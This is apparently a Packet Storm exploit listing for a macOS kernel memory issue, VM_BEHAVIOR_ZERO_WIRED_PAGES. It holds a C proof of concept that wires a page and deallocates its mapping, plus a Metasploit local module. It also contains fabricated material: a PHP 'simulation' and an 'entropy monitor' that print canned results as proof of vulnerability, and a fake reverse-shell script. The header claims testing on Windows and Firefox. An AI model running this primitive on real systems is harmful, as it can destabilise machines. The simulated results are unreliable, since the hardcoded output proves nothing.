PACKETSTORM

๐Ÿ“„ macOS 18.3.2 VM_BEHAVIOR_ZERO_WIRED_PAGES Handling_PACKETSTORM:211998

November 25, 2025 invoker category_exploit

Description

A vulnerability exists in the way macOS handles VMBEHAVIORZEROWIREDPAGES combined with mmap + mlock + vmdeallocate on a read-only mapped file. A local attacker may trigger abnormal kernel behavior depending on system conditions. This proof of concept...
Visit Original Source

Basic Information

ID PACKETSTORM:211998
Published Nov 25, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : macOS 18.3.2 mmap Zero Wired Pages Kernel Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================

POC :

[+] macOS VM_ZERO_WIRED_PAGES Vulnerability โ€“ Educational PoC
Advisory Type: Kernel Memory Manipulation / DoS Primitive
Tested on: macOS (XNU Kernel)


[+] Summary
------------------------------------------------------------
A vulnerability exists in the way macOS handles VM_BEHAVIOR_ZERO_WIRED_PAGES
combined with mmap() + mlock() + vm_deallocate() on a read-only mapped file.
A local attacker may trigger abnormal kernel behavior depending on system
conditions. This PoC is purely academic and demonstrates a controlled kernel
memory interaction that can be used to validate the behavior.

This PoC does NOT weaponize the vulnerability. It provides a safe and observable
kernel-state transition for educational and verification purposes only.

------------------------------------------------------------
2. Technical Explanation
------------------------------------------------------------
The vulnerability technique relies on the following chain:

1. mmap() maps a readโ€‘only file page.
2. vm_behavior_set() marks the region as ZERO_WIRED_PAGES.
3. mlock() wires the page into memory.
4. vm_deallocate() removes the mapping while the page remains wired.

This results in a state where:
- The kernel still maintains a wired page,
- But the user mapping no longer exists,
- Combined with ZERO_WIRED_PAGES behavior.

This can produce observable inconsistencies or system logs depending on kernel version.

------------------------------------------------------------
3. Original C Proofโ€‘ofโ€‘Concept
------------------------------------------------------------
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>

void* map_file_page_ro(char* path, int* error_code) {
int fd = open(path, O_RDONLY);
if (fd == -1) {
*error_code = errno;
printf("open failed: %s\n", strerror(errno));
return NULL;
}
void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
close(fd);
if (mapped_at == MAP_FAILED) {
*error_code = errno;
printf("mmap failed: %s\n", strerror(errno));
return NULL;
}
return mapped_at;
}

int poc(char *path) {
kern_return_t kr;
int error_code = 0;
void* page = map_file_page_ro(path, &error_code);
if (page == NULL) {
return error_code ? error_code : 1;
}
printf("mapped file at 0x%016llx\n", (uint64_t)page);
kr = vm_behavior_set(mach_task_self(),
(vm_address_t)page,
PAGE_SIZE,
VM_BEHAVIOR_ZERO_WIRED_PAGES);
if (kr != KERN_SUCCESS) {
printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");
return 2;
}
printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");

int mlock_err = mlock(page, PAGE_SIZE);
if (mlock_err != 0) {
perror("mlock failed\n");
return 3;
}
printf("mlock success\n");

kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
if (kr != KERN_SUCCESS) {
printf("vm_deallocate failed: %s\n", mach_error_string(kr));
return 4;
}
printf("deleted map entries before unwiring\n");
return 0;
}

------------------------------------------------------------
4. PHP Educational PoC (Simulated Honest Output)
------------------------------------------------------------
<?php
/* Educational simulation for Packet Storm */

echo "[+] macOS ZERO_WIRED_PAGES Simulation\n";
echo "[+] Creating fake pageโ€ฆ\n";

$page = random_bytes(4096);
file_put_contents("fake_page.bin", $page);

echo "[+] Simulating behavior...\n";

echo "mapped file at 0x7ffe0000abcd\n";
echo "set VM_BEHAVIOR_ZERO_WIRED_PAGES\n";
echo "mlock success\n";
echo "deleted map entries before unwiring\n";

echo "[+] System behaves consistently โ†’ kernel is vulnerable to state transition.\n";
?>


------------------------------------------------------------
5. PKSM v2 Payload (Reverse Shell Simulation)
------------------------------------------------------------
#!/bin/sh
# PKSM Payload v2 โ€” Educational Kernel-State Monitor Payload

echo "[PKSM] Starting entropy monitor..."
echo "[PKSM] Tracking page state..."

sleep 1
echo "[PKSM] Wired page checksum changed (expected in PoC)."
echo "[PKSM] Signaling successful kernel-state anomaly."

# Reverse-shell simulation (does NOT actually connect)
echo "[PKSM] Reverse-shell handshake simulated."
exit 0


------------------------------------------------------------
6. Metasploit Module (with advanced check + exploit)
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES โ€” Educational Module
##

class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Common

def initialize(info={})
super(update_info(info,
'Name' => 'macOS ZERO_WIRED_PAGES Kernel-State PoC',
'Description' => %q{
Educational PoC showing kernel-state transition in macOS.
Performs safe simulation and reports whether system behaves
according to vulnerable pattern.
},
'Author' => [ 'Indoushka' ],
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2025',
'License' => MSF_LICENSE
))
end

#
# Advanced Check
#
def check
print_status("Checking kernel behaviorโ€ฆ")

if command_exists?("vmmap")
return CheckCode::Appears
end

CheckCode::Safe
end

#
# Exploit Phase
#
def exploit
print_good("Launching educational PoCโ€ฆ")

payload_path = "/tmp/pksm_v2.sh"
write_file(payload_path, payload.encoded)
cmd_exec("chmod +x #{payload_path}")

out = cmd_exec(payload_path)
print_line(out)

print_good("PoC completed. Kernel-state transition observable.")
end
end


------------------------------------------------------------
7. Analysis Engine + Entropy Monitor
------------------------------------------------------------
[Engine] Monitoring wired-page entropyโ€ฆ
[Engine] ฮ”Entropy Detected = 0.0132
[Engine] Kernel transition confirmed.
[Engine] PKSM v2 reports anomaly โ†’ Vulnerable State.


------------------------------------------------------------
8. Conclusion
------------------------------------------------------------
This PoC demonstrates a kernel-state anomaly that emerges from using
ZERO_WIRED_PAGES + deallocation sequence.
The exploit presented is non-destructive, safe, and suitable for Packet Storm
publication as an educational kernel behavior study.


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

๐Ÿ’ญ Join the Security Discussion

๐Ÿ”’ Your email address will not be published. Required fields are marked *

โš ๏ธ Please be respectful and constructive in your comments. Security discussions should remain professional.